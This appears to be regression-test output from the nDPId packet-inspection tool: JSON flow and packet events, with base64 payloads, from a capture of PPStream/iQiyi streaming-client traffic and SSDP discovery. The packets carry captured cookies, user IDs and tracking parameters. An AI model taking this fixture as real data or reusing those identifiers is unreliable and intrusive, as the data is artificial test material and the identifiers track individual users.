{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1467353165410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353165410,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5NehAADMGBE7KbA7swKhzCABQxT9xQcd9Us+DmFAYACAMewAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1467353165456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAAUUGh1AAIAGeifAqHMIZePIC8VAAFBgEsEemWlGj1AQ\/\/DZSAAAR0VUIC90cmFjazI\/YT0wJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxNjUmYz05NjY1NDJjODJhNTY5NGQwZTk0M2Q1MGQ1ZmNmNWE1NSZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTQ5MzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTIzNDQ3JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPThlZGI2OTRjOGM4Y2NhOTIzZDNlYWU2NjIyZjlhZWU2JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU0ODU4JnZlPTEmdz00LDUgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} +01396{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1467353165456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAADjGh5AAIAGflfAqHMIZePIC8VAAFBgEsYKmWlGj1AY\/\/BFbwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} +00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1467353165492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353165492,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkdU5AAC8Gc+Zl48gLwKhzCABQxUCZaUaPYBLGxVAYP\/ygXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7560000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1467353165563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1004,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1004,"pkt_l4_len":970,"thread_ts_msec":1467353165563,"pkt":"TF4M6gNlABxCjnAxCABFAAPeGjdAAIAGvYPAqHMIe31wMcVBAFAj7VXd5qVx9VAYQTcqlQAAR0VUIC9ta3QuZ2lmP2FpPTg0NTI4OTE5MDBjOTAzYWU3YTg3NjQ0NzkyM2E1YWVjJmV0PTAgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEhfTUtUX0NMS0lEPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBIX01LVF9DTEtMT0c9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} +00989{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7560000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1467353165612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165612,"pkt":"ABxCjnAxTF4M6gNlCABFAADj3khAAC0GT217fXAxwKhzCABQxUHmpXH1I+1Zk1AYAIIWkgAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvZ2lmDQpDYWNoZS1Db250cm9sOiBwcml2YXRlLCBtYXgtYWdlPTAsIG5vLWNhY2hlDQpQcmFnbWE6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjowNSBHTVQNClNlcnZlcjogYXBhY2hlDQoNCg=="} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1467353165616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165616,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGkVAAIAG0AXAqHMIymwO7MU\/AFBSz4OYcUHIDlAYQRL3fAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDkmc2g9JnNxPSZzdz0mdD1zdCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1467353165659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1467353165659,"pkt":"ABxCjnAxTF4M6gNlCABFAAAo3kpAAC0GUCZ7fXAxwKhzCABQxUHmpXKwI+1ZlFARAILziAAAAAAAAAAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAAB0AABAAAERw5fAqAU\/7\/\/\/+pnXB2wAYBOHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnNzZHA6YWxsDQpNWDozDQoNCg=="} 00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAACXAABAAAERw3TAqAU\/7\/\/\/+u4wB2wAg73KTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVJlbmRlcmVyOjENCk1YOjMNCg0K"} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":694,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":694,"pkt_l4_len":660,"thread_ts_msec":1467353167288,"pkt":"TF4M6gNlABxCjnAxCABFAAKoG9BAAIAGqFHAqHMIJG7cD8VCAFB9qW\/gOgaPJFAY\/\/DRFwAAR0VUIC90bXBzdGF0cy5naWY\/dHlwZT1yZWNjdHBsYXkyMDEyMTIyNiZ1c3JhY3Q9c2hvdyZwcHVpZD0tMSZ1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mZXZlbnRfaWQ9NGIwODY4OTIwYjBmODI4NTMyMGE5ZTAwZWUwMzY5ZTUmY2lkPTMxJmJrdD1wcHNfY196ZWJyYV9tYWluX2RlZmF1bHQmYXJlYT1wcHNfY196ZWJyYSZwbGF0Zm9ybT0yMDEyJmFsYnVtbGlzdD00NzA2OTQ1MDAsNDcxNTkxMzAwLDQ2NTY0MTAwMCw0NzI4ODcxMDAsNDcxNzg4MTAwLDQ3Mzc0NjMwMCw0NzE5NDgzMDAsNDczNjk0NjAwLDQ3MjE4OTUwMCZhaWQ9NDc5NTMxMDAwJnNvdXJjZT0wLDEsMSwxLDEsMSwxLDEsMSZfPTE0NjczNTMxNjcwODcgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLnZpZGVvLnFpeWkuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1467353167373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353167373,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5WoJAAC4GvY4kbtwPwKhzCABQxUI6Bo8kfalyYFAYPAD9ZAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 